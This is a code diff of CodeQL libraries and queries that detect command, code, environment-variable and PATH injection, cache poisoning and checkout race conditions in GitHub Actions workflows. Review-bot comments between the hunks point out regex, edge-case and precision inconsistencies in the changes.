@@ -181,7 +179,7 @@ private predicate jsonEvent(string context) { "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.issue", "github\\.event\\.merge_group", "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", @@ -193,7 +191,7 @@ private predicate jsonEvent(string context) { "github\\.event\\.workflow_run\\.pull_requests", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -204,9 +202,9 @@ class GitHubSource extends RemoteFlowSource { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - Utils::normalizeExpr(context) = "github.head_ref" and + normalizeExpr(context) = "github.head_ref" and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } 
@@ -218,11 +216,18 @@ class GitHubEventSource extends RemoteFlowSource { string flag; GitHubEventSource() { - exists(Expression e, string context, string context_prefix | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + exists(e.getEnclosingCompositeAction()) + ) | titleEvent(context) and flag = "title" or @@ -258,11 +263,11 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + normalizeExpr(context).matches("%" + context_prefix + "%") ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") + normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") ) ) and flag = "json" @@ -283,17 +288,6 @@ class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } -/** - * An input for a Composite Action - */ -class CompositeActionInputSource extends RemoteFlowSource { - CompositeAction c; - - CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - - override string getSourceType() { result = "input" } -} - /** * A downloaded artifact. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cb391f2a2620..bbc40d56e2b4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
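Review bot: The new pattern `".*\\bgithub.event\\b.*"` in `GitHubEventJsonSource` leaves the dot between `github` and `event` unescaped, so it matches any single character there, while every other pattern in this file writes `github\\.event`; use `".*\\bgithub\\.event\\b.*"`. The rewrite also removes the `(\\.event)?` alternative, so a bare `github` context no longer qualifies through this branch even though `"github"` is still in `jsonEvent`'s list — fine if intended, but worth a word in the QLDoc of the class, whose start is outside the hunk.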
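Review bot: Deleting `CompositeActionInputSource` in the `@@ -283,17 +288,6 @@` hunk means a composite action's inputs are no longer sources in their own right; together with the `ParameterNode.isParameterOf` addition in DataFlowPublic this presumably moves them to call-site parameter flow. A composite action analyzed without any caller in the database (a standalone action repository) then has no source for its inputs, which the removed class covered. If that trade-off is deliberate, a short comment at `GitHubEventSource`'s new `exists(e.getEnclosingCompositeAction())` branch, e.g. `// composite actions have no trigger; inputs flow in as parameters from the calling workflow`, would stop the next reader from re-adding the class.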
@@ -35,9 +35,9 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and ( - Utils::writeToGitHubEnv(run, _, value) or - Utils::writeToGitHubOutput(run, _, value) or - Utils::writeToGitHubPath(run, value) + writeToGitHubEnv(run, _, value) or + writeToGitHubOutput(run, _, value) or + writeToGitHubPath(run, value) ) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run.getScriptScalar() @@ -61,7 +61,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(varName) and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -72,7 +72,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: pred.asExpr() = run.getInScopeEnvVarExpr(varName) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -88,7 +88,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } 
@@ -100,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f63af3c10be4..b6b7cd539279 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -67,7 +67,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -91,7 +91,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else if this instanceof CompositeAction - then result = this.(CompositeAction).getLocation().getFile().getRelativePath() + then + result = + this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .prefix(this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(["/action.yml", "/action.yaml"])) else none() } } 
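Review bot: The new `CompositeAction` branch of `DataFlowCallable` computes `prefix(indexOf(["/action.yml", "/action.yaml"]))` on the relative path, so an action file at the repository root (`action.yml` with no directory component) contains no `/action.yml` substring and the predicate yields nothing for it. Binding the path once, `exists(string path | path = this.(CompositeAction).getLocation().getFile().getRelativePath() | result = path.prefix(path.indexOf(["/action.yml", "/action.yaml"])))`, also removes the duplicated six-call chain; the root case needs an explicit alternative producing whatever name the `Uses` call side resolves a root-level local action to, which is not visible in this hunk.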
@@ -156,7 +166,10 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 681d6f1cfc39..87e8124db916 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -53,7 +53,8 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInput(pos) + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) } override string toString() { result = "input " + input.toString() } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 25de24032ba2..b17b4bc6b0d7 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -12,7 +12,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) 
@@ -32,7 +32,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { exists(Run run, Expression expr, string varname, string value | this.asExpr().getInScopeEnvVarExpr(varname) = expr and run.getScriptScalar() = this.asExpr() and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and ( value.matches("%$" + ["", "{", "ENV{"] + varname + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0467a51f4e9c..12919004c039 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -11,7 +11,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | expr = run.getInScopeEnvVarExpr(varname) and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and run.getScriptScalar() = this.asExpr() and value.matches("%$" + ["", "{", "ENV{"] + varname + "%") ) @@ -23,7 +23,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 070dcbda5329..40dfbd3a0b09 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -75,7 +75,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and + writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index f6598f1faaf4..aeceaa8da756 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -4,7 +4,7 @@ import codeql.actions.DataFlow bindingset[s] predicate containsPullRequestNumber(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", "\\bgithub\\.event\\.pull_request\\.id\\b", @@ -24,7 +24,7 @@ predicate containsPullRequestNumber(string s) { bindingset[s] predicate containsHeadSHA(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", @@ -51,7 +51,7 @@ predicate containsHeadSHA(string s) { bindingset[s] predicate containsHeadRef(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", 
@@ -234,7 +234,7 @@ class LabelControlCheck extends ControlCheck { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" ], _, _) @@ -248,7 +248,7 @@ class ActorControlCheck extends ControlCheck { // eg: github.triggering_actor != 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", @@ -262,7 +262,7 @@ class AssociationControlCheck extends ControlCheck { AssociationControlCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.comment\\.author_association\\b", "\\bgithub\\.event\\.issue\\.author_association\\b", diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 702a454645c5..27cad8b98a43 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -16,7 +16,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "test.yml" + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } 
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
similarity index 74%
rename from ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
rename to ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
index a25473fd812e..fc96c3d43538 100644
--- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
+++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
@@ -4,8 +4,8 @@
  * @kind path-problem
  * @problem.severity error
  * @security-severity 9
- * @precision high
- * @id actions/privileged-envpath-injection
+ * @precision very-high
+ * @id actions/envpath-injection/critical
  * @tags actions
  * security
  * external/cwe/cwe-077
@@ -19,14 +19,17 @@ import EnvPathInjectionFlow::PathGraph
 from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
 where
 EnvPathInjectionFlow::flowPath(source, sink) and
- // sink belongs to a privileged job
- sink.getNode().asExpr().getEnclosingJob().isPrivileged() and
 (
- not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ inPrivilegedCompositeAction(sink.getNode().asExpr())
 or
+ inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr())
+ ) and
+ (
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
 sink.getNode() instanceof EnvPathInjectionFromFileReadSink
+ or
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
 )
 select sink.getNode(), source, sink,
- "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.",
+ "Potential PATH environment variable injection in $@, which may be controlled by an external user.",
 sink, sink.getNode().toString()
diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql
similarity index 78%
rename from ql/src/Security/CWE-077/EnvPathInjection.ql
rename to ql/src/Security/CWE-077/EnvPathInjectionMedium.ql
index 80d1729b2670..cc067598c893 100644
--- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envpath-injection + * @id actions/envpath-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -20,14 +20,9 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql similarity index 77% rename from ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 5311d9a4de85..4b0799ca4410 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envvar-injection + * @precision very-high + * @id actions/envvar-injection/critical * @tags actions * security * external/cwe/cwe-077 
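Review bot: The rewritten `where` clause `inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) and ( … )` relies on `and` binding tighter than `or`, so the artifact restriction applies only to the job branch; that matches the removed code, but it now reads ambiguously because both alternatives are single predicate calls. Writing `or (inNonPrivilegedJob(sink.getNode().asExpr()) and (` with the matching `)` makes the grouping explicit; the same applies to `EnvVarInjectionMedium.ql` at `@@ -29,14 +29,9 @@`, where the conjunct is `artifactToFileRead`. The parenthesised artifact condition continues outside the hunk.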
@@ -28,10 +28,13 @@ predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, - "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql similarity index 80% rename from ql/src/Security/CWE-077/EnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 8c2510954577..7eb239e83a06 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envvar-injection + * @id actions/envvar-injection/medium * @tags actions * security * external/cwe/cwe-077 
@@ -29,14 +29,9 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) ) diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql similarity index 59% rename from ql/src/Security/CWE-078/PrivilegedCommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionCritical.ql index adb8f25f077a..2c2ab2f2af5b 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Command built from user-controlled sources on a privileged context + * @name Command built from user-controlled sources * @description Building a system command from user-controlled sources is vulnerable to insertion of * malicious code by the user. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-command-injection + * @precision very-high + * @id actions/command-injection/critical * @tags actions * security * external/cwe/cwe-078 
@@ -19,10 +19,11 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged command injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql similarity index 79% rename from ql/src/Security/CWE-078/CommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionMedium.ql index 6ac15f83207a..072ebbc8dced 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/command-injection + * @id actions/command-injection/medium * @tags actions * security * external/cwe/cwe-078 @@ -20,12 +20,8 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, 
diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql similarity index 68% rename from ql/src/Security/CWE-094/PrivilegedCodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionCritical.ql index d043bd930b6a..7e14825a2952 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Code injection on a privileged context + * @name Code injection * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary * code execution. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-code-injection + * @precision very-high + * @id actions/code-injection/critical * @tags actions * security * external/cwe/cwe-094 @@ -21,10 +21,11 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql similarity index 77% rename from ql/src/Security/CWE-094/CodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionMedium.ql index aa5bbfdf75a6..7599ef8847ba 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql 
@@ -5,8 +5,8 @@ * @kind path-problem * @problem.severity warning * @security-severity 5.0 - * @precision high - * @id actions/code-injection + * @precision medium + * @id actions/code-injection/medium * @tags actions * security * external/cwe/cwe-094 @@ -22,12 +22,8 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 0250d9aada1d..80ebd92c5d31 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
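Review bot: `CodeInjectionMedium.ql` moves to `@precision medium` while the three sibling `*Medium.ql` queries in this commit (`EnvPathInjectionMedium`, `EnvVarInjectionMedium`, `CommandInjectionMedium`) stay at `@precision high` with the same `@security-severity 5.0` and the same non-privileged `where` shape. If the lower precision is deliberate (a known false-positive class for code injection in non-privileged jobs, say), the reason belongs in the QLDoc `@description` above this hunk; otherwise align it to `high`.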
@@ -18,22 +18,24 @@ import codeql.actions.security.PoisonableSteps
 from LocalJob j, PRHeadCheckoutStep checkout, Step s
 where
-  // The workflow runs in the context of the default branch
+  // the workflow runs in the context of the default branch
   runsOnDefaultBranch(j) and
-  // The job checkouts untrusted code from a pull request
+  // the job checkouts untrusted code from a pull request
   // TODO: Consider adding artifact downloads as a potential source of cache poisoning
   j.getAStep() = checkout and
+  // job can be triggered by an external user
+  j.isExternallyTriggerable() and
   (
-    // The job writes to the cache
+    // the job writes to the cache
     // (No need to follow the checkout step as the cache writing is normally done after the job completes)
     j.getAStep() = s and
     s instanceof CacheWritingStep
     or
-    // The job executes checked-out code
+    // the job executes checked-out code
     // (The cache specific token can be leaked even for non-privileged workflows)
     checkout.getAFollowingStep() = s and
     s instanceof PoisonableStep and
-    // Excluding privileged workflows since they can be easily exploited in similar circumstances
+    // excluding privileged workflows since they can be easily exploited in similar circumstances
     not j.isPrivileged()
   )
 select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s,
diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
index 5d739d746d50..1c13497ddaf2 100644
--- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
@@ -21,7 +21,9 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local
 where
   CodeInjectionFlow::flowPath(source, sink) and
   j = sink.getNode().asExpr().getEnclosingJob() and
-  // Excluding privileged workflows since they can be easily exploited in similar circumstances
+  // job can be triggered by an external user
+  j.isExternallyTriggerable() and
+  // excluding privileged workflows since they can be easily exploited in similar circumstances
   not j.isPrivileged() and
   // The workflow runs in the context of the default branch
   runsOnDefaultBranch(j)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
index 6b3e0628f40b..2144db7afa0c 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
@@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps
 
 from ControlCheck check, MutableRefCheckoutStep checkout
 where
+  // the job can be triggered by an external user
+  check.getEnclosingJob().isExternallyTriggerable() and
   // the mutable checkout step is protected by an access check
   check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
   // the checked-out code may lead to arbitrary code execution
@@ -25,7 +27,7 @@ where
   // label gates do not depend on the triggering event
   check instanceof LabelControlCheck
   or
-  // actor or Association gates apply to IssueOps only
+  // actor or association gates apply to IssueOps only
   (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and
   check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment")
 )
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
index fcf832699603..11dfa7fc5670 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
